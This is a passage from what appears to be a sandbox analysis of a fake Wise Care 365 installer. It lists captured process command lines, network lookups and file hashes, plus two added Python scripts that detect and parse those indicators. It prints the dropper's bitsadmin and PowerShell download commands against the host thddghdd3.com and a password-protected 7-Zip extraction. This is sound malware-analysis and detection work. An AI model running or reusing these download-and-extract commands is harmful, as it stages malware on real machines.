bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml

C:\ProgramData\ConsoleApp\7za.exe

7za.exe x -y -p1r7d2kvUf3 "*.7z"

C:\Windows\SysWOW64\timeout.exe

timeout /T 3 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe

"C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe"

C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$20276,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe"
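The command lines above are the useful part of this report for detection: two living-off-the-land downloads from the same host (bitsadmin /transfer and a PowerShell WebClient.DownloadFile), a dropped 7za.exe extracting a password-protected archive (the password is on the command line), and a timeout delay, all driven from batch files under C:\ProgramData. The script below is an added example, not part of the report, that runs simple command-line rules over those exact lines and pulls out the URL, host and archive-password indicators; the rule names and the staged-dropper verdict logic are the example's own, not sandbox signature names.

```python
import re
from urllib.parse import urlparse

# Command lines copied verbatim from the Processes section of this report; they
# are the detection input here, not a new capture.
PROCESS_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "',
    r'C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "',
    r'''powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"''',
    r'bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml',
    r'7za.exe x -y -p1r7d2kvUf3 "*.7z"',
    r'timeout /T 3 /NOBREAK',
]

# Rule names are this example's own labels (hypothetical), not sandbox signature names.
RULES = [
    ("bitsadmin_download", re.compile(r'\bbitsadmin(\.exe)?\b.*/transfer\b', re.I)),
    ("powershell_webclient_download", re.compile(r'\bpowershell\b.*\.(DownloadFile|DownloadString)\b', re.I)),
    ("7zip_password_extract", re.compile(r'\b7za?(\.exe)?\b\s+x\b.*\s-p\S+', re.I)),
    ("timeout_delay", re.compile(r'\btimeout(\.exe)?\s+/T\s+\d+', re.I)),
    ("cmd_runs_bat_from_programdata", re.compile(r'cmd\.exe\s+/c\s+"*C:\\ProgramData\\[^"]*\.bat', re.I)),
]
URL_RE = re.compile(r'https?://[^\s\'"<>]+', re.I)
ARCHIVE_PW_RE = re.compile(r'\s-p(\S+)')  # 7-Zip's -p<password> switch has no space


def match_rules(cmdline):
    """Return the names of every rule that fires on one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def extract_iocs(cmdlines):
    """Pull URLs, hostnames and any 7-Zip archive password out of the command lines."""
    urls, hosts, passwords = set(), set(), set()
    for c in cmdlines:
        for u in URL_RE.findall(c):
            urls.add(u)
            hosts.add(urlparse(u).hostname)
        if "7zip_password_extract" in match_rules(c):
            m = ARCHIVE_PW_RE.search(c)
            if m:
                passwords.add(m.group(1))
    return {"urls": sorted(urls), "hosts": sorted(hosts), "archive_passwords": sorted(passwords)}


def verdict(cmdlines):
    """Combine per-line hits into a chain-level verdict: a download followed by a
    password-protected extraction is the staged-dropper pattern seen in this report."""
    hits = set()
    for c in cmdlines:
        hits.update(match_rules(c))
    downloaders = hits & {"bitsadmin_download", "powershell_webclient_download"}
    if downloaders and "7zip_password_extract" in hits:
        return "staged_dropper", sorted(hits)
    if downloaders:
        return "lolbin_download", sorted(hits)
    return "none", sorted(hits)


if __name__ == "__main__":
    label, hits = verdict(PROCESS_CMDLINES)
    print(label, hits)
    print(extract_iocs(PROCESS_CMDLINES))
```

The password on the 7za.exe command line is worth capturing as an indicator in its own right: a password-protected archive is opaque to on-access scanning, and the same password tends to be reused across a campaign's payloads, so it pivots well in process-creation telemetry.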

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 thddghdd3.com udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
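Reading the Network table: every 8.8.8.8:53 row is a DNS query, the *.in-addr.arpa names are reverse (PTR) lookups for addresses the guest had talked to, and the only TCP sessions are to tse1.mm.bing.net on 443 (by its name a Windows background fetch rather than the sample's traffic; that attribution is an assumption). thddghdd3.com, the host in both download command lines, was looked up but no connection to it is recorded, and neither hfile.bin nor Telemetry.xml appears in the Files section, which is consistent with the downloads not completing in this run. The script below is an added example, not part of the report, that parses the table as printed, decodes the PTR names back to IPv4 addresses, and separates hosts that were resolved from hosts that were actually contacted; the function and key names are its own.

```python
import ipaddress
from collections import Counter

# Rows copied from this report's Network table (Country Destination Domain Proto).
NETWORK_ROWS = """\
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 thddghdd3.com udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
"""


def ptr_to_ip(name):
    """Turn a reverse-DNS query name d.c.b.a.in-addr.arpa back into the address a.b.c.d."""
    suffix = ".in-addr.arpa"
    if not name.lower().endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(octets))))
    except ipaddress.AddressValueError:
        return None


def parse_rows(text):
    """One dict per table row; the Destination column is split into ip and port."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        country, dest, domain, proto = parts
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto})
    return rows


def summarize(rows):
    """Split DNS rows into forward and PTR lookups, count real connections, and
    report hosts that were resolved but never contacted."""
    forward, reverse, conns = set(), {}, Counter()
    for r in rows:
        if r["port"] == 53 and r["proto"] == "udp":
            ip = ptr_to_ip(r["domain"])
            if ip:
                reverse[ip] = r["domain"]
            else:
                forward.add(r["domain"])
        else:
            conns[(r["ip"], r["port"], r["domain"], r["proto"])] += 1
    contacted_hosts = {c[2] for c in conns}
    contacted_ips = {c[0] for c in conns}
    return {
        "forward_lookups": sorted(forward),
        "ptr_queries": dict(sorted(reverse.items())),
        "connections": dict(conns),
        "resolved_but_not_contacted": sorted(forward - contacted_hosts),
        "contacted_ips_with_ptr_query": sorted(contacted_ips & set(reverse)),
    }


if __name__ == "__main__":
    for k, v in summarize(parse_rows(NETWORK_ROWS)).items():
        print(k, v)
```

The one-line takeaway from the summary is that thddghdd3.com is the only name resolved and never connected to, so the domain (not a payload hash) is the indicator this run actually yields; the PTR query for 150.171.28.10 pairing with the bing.net sessions shows the reverse lookups are the guest annotating its own connections, not sample activity.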

Files

memory/1684-1-0x0000000000400000-0x00000000004C0000-memory.dmp

memory/1684-2-0x0000000000401000-0x00000000004A9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp

MD5 f098bb35dca6ae44a05c65aac7a5444b
SHA1 c5c50d740c1b8e9d8715fc3b2c8026156295a437
SHA256 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe
SHA512 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b

memory/3960-6-0x0000000000400000-0x000000000067B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\ProgramData\ConsoleApp\ControlSet000.bat

MD5 484c8df5d5bd9d82f4ac1861472cf519
SHA1 eddc0d20c81d9dba14ee0be32c7c5f563481e792
SHA256 f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953
SHA512 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7

C:\ProgramData\ConsoleApp\main.bat

MD5 0ddc6dd98f86cff7e50c1621fd16b55a
SHA1 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a
SHA256 b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6
SHA512 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609

memory/3124-25-0x0000000072B0E000-0x0000000072B0F000-memory.dmp

memory/3124-26-0x0000000004C70000-0x0000000004CA6000-memory.dmp

memory/3124-27-0x0000000005410000-0x0000000005A38000-memory.dmp

memory/3124-28-0x0000000005250000-0x0000000005272000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_taajmkf4.od4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3124-29-0x0000000005B40000-0x0000000005BA6000-memory.dmp

memory/3124-30-0x0000000005BB0000-0x0000000005C16000-memory.dmp

memory/3124-40-0x0000000005D20000-0x0000000006074000-memory.dmp

memory/3124-41-0x0000000006200000-0x000000000621E000-memory.dmp

memory/3124-42-0x0000000006250000-0x000000000629C000-memory.dmp

memory/3124-43-0x0000000007870000-0x0000000007EEA000-memory.dmp

memory/3124-44-0x0000000006710000-0x000000000672A000-memory.dmp

C:\ProgramData\ConsoleApp\7za.exe

MD5 c3d309156b8e8cf1d158de5fab1c2b40
SHA1 58ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA512 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe

MD5 05fda662bb382c2c95b9318b2394b246
SHA1 69365314afb6102209a806e0e474d94e58207ec6
SHA256 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2
SHA512 b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312

memory/5088-52-0x0000000000400000-0x0000000000417000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp

MD5 9d7850e858c24db77b91b25adf93812f
SHA1 f0bb0a9074b38dad7492422247c0a316197d26b6
SHA256 c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8
SHA512 e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec

memory/928-68-0x0000000007130000-0x0000000007146000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SQCH2.tmp\ISTask.dll

MD5 86a1311d51c00b278cb7f27796ea442e
SHA1 ac08ac9d08f8f5380e2a9a65f4117862aa861a19
SHA256 e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d
SHA512 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec

C:\Users\Admin\AppData\Local\Temp\is-SQCH2.tmp\VclStylesInno.dll

MD5 b0ca93ceb050a2feff0b19e65072bbb5
SHA1 7ebbbbe2d2acd8fd516f824338d254a33b69f08d
SHA256 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246
SHA512 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2

memory/928-74-0x0000000007360000-0x000000000767A000-memory.dmp

memory/928-78-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-81-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-84-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-83-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-82-0x00000000077F0000-0x00000000077F1000-memory.dmp

memory/928-80-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-79-0x00000000077E0000-0x00000000077E1000-memory.dmp

memory/928-95-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-99-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-132-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-133-0x0000000007900000-0x0000000007901000-memory.dmp

memory/928-131-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-130-0x00000000078F0000-0x00000000078F1000-memory.dmp

memory/928-128-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-127-0x00000000078E0000-0x00000000078E1000-memory.dmp

memory/928-126-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-125-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-124-0x00000000078D0000-0x00000000078D1000-memory.dmp

memory/928-123-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-122-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-121-0x00000000078C0000-0x00000000078C1000-memory.dmp

memory/928-120-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-119-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-118-0x00000000078B0000-0x00000000078B1000-memory.dmp

memory/928-117-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-116-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-115-0x00000000078A0000-0x00000000078A1000-memory.dmp

memory/928-114-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-113-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-112-0x0000000007890000-0x0000000007891000-memory.dmp

memory/928-111-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-110-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-109-0x0000000007880000-0x0000000007881000-memory.dmp

memory/928-108-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-107-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-106-0x0000000007870000-0x0000000007871000-memory.dmp

memory/928-105-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-104-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-103-0x0000000007860000-0x0000000007861000-memory.dmp

memory/928-102-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-101-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-100-0x0000000007850000-0x0000000007851000-memory.dmp

memory/928-129-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-98-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-97-0x0000000007840000-0x0000000007841000-memory.dmp

memory/928-96-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-92-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-91-0x0000000007820000-0x0000000007821000-memory.dmp

memory/928-90-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-89-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-88-0x0000000007810000-0x0000000007811000-memory.dmp

memory/928-87-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-86-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-85-0x0000000007800000-0x0000000007801000-memory.dmp

memory/928-94-0x0000000007830000-0x0000000007831000-memory.dmp

memory/928-93-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-77-0x0000000007680000-0x00000000077C0000-memory.dmp

memory/928-76-0x00000000077D0000-0x00000000077D1000-memory.dmp

memory/3960-148-0x0000000000400000-0x000000000067B000-memory.dmp